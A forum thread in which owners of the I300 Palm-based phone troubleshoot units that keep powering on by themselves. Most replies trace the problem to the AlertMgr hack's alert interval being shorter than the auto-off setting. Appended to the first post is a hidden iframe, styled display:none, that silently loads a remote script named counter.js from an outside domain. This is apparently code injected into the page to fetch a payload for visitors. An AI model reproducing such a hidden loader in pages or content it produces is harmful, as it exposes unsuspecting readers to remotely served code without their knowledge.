Question Inexplicable and constant power on

For no apparent reason, my unit keeps powering itself on every 30 seonds or so; soft resets and battery changes have made no difference (I'd like to put off hard reset option unless I absolutely have to). Anyone seen this weird behavior, or have a suggestion?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

After a few attempts, I believe the culprit was I300 AlertMgr, which I installed yesterday. I had the notification set to 30 seconds, and I set it to 60 seconds and the power on's stopped happening. The weird thing is that I didn't have any voicemails, etc., so not sure why AlertMgr was "waking up" the unit. Oh well.

Not only alert manager. Mine was doing this for a while too. Don't know what it was but it seemed to stop after I cancelled my msn web alerts.

I don't mean to imply that you wouldn't have already checked into this.....but....make sure you have your auto-off feature set to some time less than what your I300 Alertmgr hack is set for. I read in another post from PDAapps, that this will mess things up.

Also, if you don't want the palm to shut off every 30 seconds, make sure the auto-off feature is set to 1 minute or 2 minutes.

Again, I don't mean to imply you wouldn't have done this already, but just thought I'd mention it.

I know exactly what he's talking about but don't know why it occurs. Its not that it turns off so quickly, but the I300 can just be sitting there while you're watching TV and all of a sudden the screen will come on. You wait for message notification and there is none. You shut the screen off and 5 seconds later it pops up again and again and again.... The only other remedy I can offer is to make sure your text message inbox is not full.

I have had the same problem numerous times, always after I've installed some kind of hack or program (i.e. ones to remap buttons or something). My theory is that it happens when it is trying to display an alert, like a reminder for an appointment. I thought of this when it occurred to me that I hadn't gotten a reminder for an appointment, but that the I300 had been powering itself on repeatedly several times in a row--I thought I was bumping buttons accidentally or something. Datebook 4, remapped buttons, etc.--I've gotten rid of them all and my reminders work perfectly and it never powers on unnecessarily. YMMV.

My auto off feature was set for 1 minute, and the Alertmgr was set for 1 1/2 minutes (90 seconds), and I was having the same problem with the alarm going off and the unit turning on every 5 seconds or so. I finally disabled Alertmgr, and all is back to normal.

Talking

I'm so glad to have found this site. I was having this same problem..! I just couldn't figure out why my unit was powering on after I powered it off! It did it over and over and I couldn't sleep. Well here I am 2:00am looking at this board and I uninstalled the I300 alertmgr hack and my machine powered right off as I type. I have it set for 30 seconds. I was about to return this baby to the store. You wouldn't believe how many mornings I woke up to a dead phone, due to the unit being on all night and never powering off.
Thanks!!

Amber

For those AlertMgr users out there that are having trouble with the display staying on, be sure to read the readme.txt. Here is a particular paragraph that just may solve your problems.

If the "Alert Also When Display On" is checked, alerts will be made
when the system is not in standby (display on) and also when the unit is
in standby. Note however, if this checkbox is checked, and if the "Seconds
between Alerts" value is less than the "auto-off" time you have set in the
main Palm preferences for your system to go into standby, then your unit
will never go into automatic standby.
You may still put it into manual
standby. Two approaches are possible: 1) Leave this box unchecked and use
whatever value in the "Seconds between Alerts" field, or, 2) Use a value
of "Seconds between Alerts" that is atleast 10 seconds greater than the
"auto-off" time you have set.

Alert Manager is one of my most valueable hacks. It would be a shame to have to disable it over something simply fixed.

Hope this helps.

Kimberly

Help! I300 won't stay OFF

Something weird just started happening with my I300. It won't stay off. If I turn it off, 20 seconds later it comes on by itself. I disabled all hacks. That didn't help.

Any ideas before my battery dies?
